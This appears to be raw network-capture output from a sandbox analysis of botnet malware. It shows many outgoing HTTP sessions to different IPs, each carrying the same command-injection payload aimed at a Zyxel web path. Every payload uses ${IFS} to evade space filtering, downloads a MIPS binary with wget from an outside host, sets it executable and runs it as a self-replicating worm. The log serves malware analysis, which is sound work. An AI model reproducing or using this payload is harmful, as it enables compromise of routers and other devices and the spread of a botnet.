                                                  Jan 19, 2024 18:24:03.191837072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6142192.168.2.135142441.50.82.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191875935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6143192.168.2.1334760139.140.188.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191915035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6144192.168.2.1334438149.171.29.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.191966057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6145192.168.2.13572108.45.106.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192019939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6146192.168.2.1351714125.235.144.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192070007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6147192.168.2.1351792133.172.122.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192106962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6148192.168.2.13602809.123.199.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192140102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6149192.168.2.1345800198.243.254.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192187071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6150192.168.2.1342096190.10.29.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192231894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6151192.168.2.134842225.191.63.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192281008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6152192.168.2.135337492.33.115.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192301989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6153192.168.2.135139482.108.43.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192336082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6154192.168.2.135423093.185.26.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192387104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6155192.168.2.133344868.70.86.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192421913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6156192.168.2.133421885.217.70.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192461967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6157192.168.2.13353708.248.161.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192523956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6158192.168.2.1354740108.47.19.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192558050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6159192.168.2.1341516126.248.18.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192596912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6160192.168.2.1348176148.167.12.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192631960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6161192.168.2.1359532212.39.20.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192672968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6162192.168.2.1358986131.144.32.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192698956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6163192.168.2.1334132117.3.203.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192765951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6164192.168.2.134357077.235.178.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192796946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6165192.168.2.1343972135.226.253.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192842007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6166192.168.2.133871896.27.145.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192862988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6167192.168.2.133931293.128.21.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192893982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6168192.168.2.1342442200.86.195.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192922115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6169192.168.2.135238481.12.65.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.192970991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6170192.168.2.1340876112.96.216.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193008900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6171192.168.2.134044434.24.121.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193053007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6172192.168.2.1360440153.227.233.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193078041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6173192.168.2.133297219.251.6.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193119049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6174192.168.2.1339842153.250.217.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193170071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6175192.168.2.134217045.17.184.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193216085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6176192.168.2.133509842.254.135.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193254948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6177192.168.2.1357820189.54.191.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193295956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6178192.168.2.134126032.72.197.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193326950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6179192.168.2.1342512199.89.113.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193365097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6180192.168.2.1334026184.78.121.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193418026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6181192.168.2.1338330218.181.195.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193459988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6182192.168.2.133684289.245.136.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193499088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6183192.168.2.1342276125.105.20.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193517923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6184192.168.2.1340184195.160.60.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193572998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6185192.168.2.135879683.22.153.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193607092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6186192.168.2.1351696106.54.26.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193635941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6187192.168.2.133297069.207.124.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193689108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6188192.168.2.135138899.141.54.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193718910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6189192.168.2.1341416183.177.226.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193767071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6190192.168.2.133882286.226.113.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193785906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6191192.168.2.1343840125.7.92.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193821907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192192.168.2.1353186150.126.89.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193870068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6193192.168.2.1350974203.176.235.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193893909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6194192.168.2.1346362213.228.218.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193932056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6195192.168.2.1332774186.231.57.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.193957090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6196192.168.2.1336042194.52.161.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194019079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6197192.168.2.135512693.118.252.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194063902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6198192.168.2.134596618.155.193.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194128990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6199192.168.2.1344886205.61.24.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194153070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6200192.168.2.1349902222.179.183.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194202900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6201192.168.2.133709839.241.6.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194228888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6202192.168.2.1360912163.207.44.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194267988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6203192.168.2.134115481.18.158.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194317102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6204192.168.2.135675646.161.23.141443
                                                  TimestampBytes transferredDirectionData
